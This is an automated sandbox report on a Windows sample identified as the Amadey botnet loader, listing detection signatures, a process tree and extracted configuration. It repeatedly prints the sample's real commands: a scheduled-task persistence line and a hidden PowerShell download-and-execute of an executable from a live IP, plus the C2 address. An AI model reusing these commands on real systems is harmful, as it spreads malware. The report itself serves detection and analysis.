Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uw7A6EF76R.exe

Overview

General Information

Sample name:uw7A6EF76R.exe
renamed because original name is a hash value
Original sample name:c0f8159d4a5c70ae8f2c1b650c9d1eab.exe
Analysis ID:1632960
MD5:c0f8159d4a5c70ae8f2c1b650c9d1eab
SHA1:d26544e533994c05a503381ba74ef773acfd1283
SHA256:6c7bf3605f290fd134f64a70fb53d2cf9152ff7f8681758c3d525b64d6eba12d
Tags:exeuser-abuse_ch
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Powershell download and execute
Yara detected obfuscated html page
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Creates HTA files
Found API chain indicative of sandbox detection
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Potentially malicious time measurement code found
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • uw7A6EF76R.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\uw7A6EF76R.exe" MD5: C0F8159D4A5C70AE8F2C1B650C9D1EAB)
    • cmd.exe (PID: 6460 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6724 cmdline: schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 6472 cmdline: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 6892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE (PID: 7052 cmdline: "C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE" MD5: 7661F8A27DD998537639F05BE76CD241)
          • rapes.exe (PID: 7000 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 7661F8A27DD998537639F05BE76CD241)
            • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 5284 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rapes.exe (PID: 5316 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 7661F8A27DD998537639F05BE76CD241)
  • svchost.exe (PID: 7472 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rapes.exe (PID: 6992 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 7661F8A27DD998537639F05BE76CD241)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\OPrA2uVEu.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      0000000B.00000002.984343955.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        0000000B.00000003.944161956.0000000005700000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          0000000C.00000002.989946070.0000000000EF1000.00000040.00000001.01000000.0000000F.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
            00000016.00000003.1491050871.0000000004D70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
              Click to see the 10 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi32_6892.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi64_512.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\uw7A6EF76R.exe", ParentImage: C:\Users\user\Desktop\uw7A6EF76R.exe, ParentProcessId: 6416, ParentProcessName: uw7A6EF76R.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 6460, ProcessName: cmd.exe
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\uw7A6EF76R.exe", ParentImage: C:\Users\user\Desktop\uw7A6EF76R.exe, ParentProcessId: 6416, ParentProcessName: uw7A6EF76R.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 6460, ProcessName: cmd.exe
                  Sigma detected: PowerShell DownloadFile
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\uw7A6EF76R.exe", ParentImage: C:\Users\user\Desktop\uw7A6EF76R.exe, ParentProcessId: 6416, ParentProcessName: uw7A6EF76R.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ProcessId: 6472, ProcessName: mshta.exe
                  Sigma detected: Suspicious MSHTA Child Process
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\uw7A6EF76R.exe", ParentImage: C:\Users\user\Desktop\uw7A6EF76R.exe, ParentProcessId: 6416, ParentProcessName: uw7A6EF76R.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ProcessId: 6472, ProcessName: mshta.exe
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6892, TargetFilename: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE
                  Sigma detected: PowerShell Download Pattern
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
                  Sigma detected: PowerShell Web Download
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6460, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn ic6iEmaQAMm /tr "mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 6724, ProcessName: schtasks.exe
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7472, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Powershell download and execute file
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 6892, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-09T13:46:06.094708+010028561471A Network Trojan was detected192.168.2.949696176.113.115.680TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: uw7A6EF76R.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXEAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                  Found malware configuration
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
                  Multi AV Scanner detection for submitted file
                  Source: uw7A6EF76R.exeVirustotal: Detection: 57%Perma Link
                  Source: uw7A6EF76R.exeReversingLabs: Detection: 47%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Sample uses string decryption to hide its real strings
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: 176.113.115.6
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: /Ni9kiput/index.php
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: S-%lu-
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: bb556cff4a
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapes.exe
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Startup
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: cmd /C RMDIR /s/q
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: rundll32
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: Programs
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: %USERPROFILE%
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll|clip.dll|
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: cred.dll
                  Source: 0000000C.00000003.949604631.0000000005390000.00000004.00001000.00020000.00000000.sdmpString decryptor: clip.dll
